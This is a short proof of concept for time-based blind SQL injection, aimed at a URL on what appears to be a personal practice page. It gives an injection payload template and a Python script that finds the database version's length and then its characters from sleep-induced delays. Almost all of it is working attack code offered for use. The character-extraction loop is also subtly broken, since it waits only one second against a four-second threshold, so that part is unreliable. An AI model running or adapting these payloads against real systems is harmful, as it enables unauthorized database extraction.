http://root0x00.altervista.org/sqli/time.php

?id=0' or if( (code), sleep(1),1) %23

===========================================================
# POC :: python
import requests, time

url = "http://root0x00.altervista.org/sqli/time.php"

time_i = 4

# check length
length = 0
for i in range(30):
    cond = "?id=0' or 1=if(length(version())=%d,sleep(5),1)%%23" % (i)
    url2 = url + cond
    time1 = time.time()
    res = requests.get(url2)
    time2 = time.time()
    if (time2-time1 > time_i):
        length = i
        break;

print ("length:", length)

# check answer
ans = ''
for i in range(1,length+1):
    for j in range(33, 128):
        cond = "?id=0' or 1=if(ascii(substr(version(),%d,1))=%d,sleep(1),1)%%23" % (i,j)
        url2 = url + cond
        time1 = time.time()
        res = requests.get(url2)
        time2 = time.time()
        if (time2-time1 > time_i):
            ans += chr(j)
            break

print ("answer:", ans)
=============================================================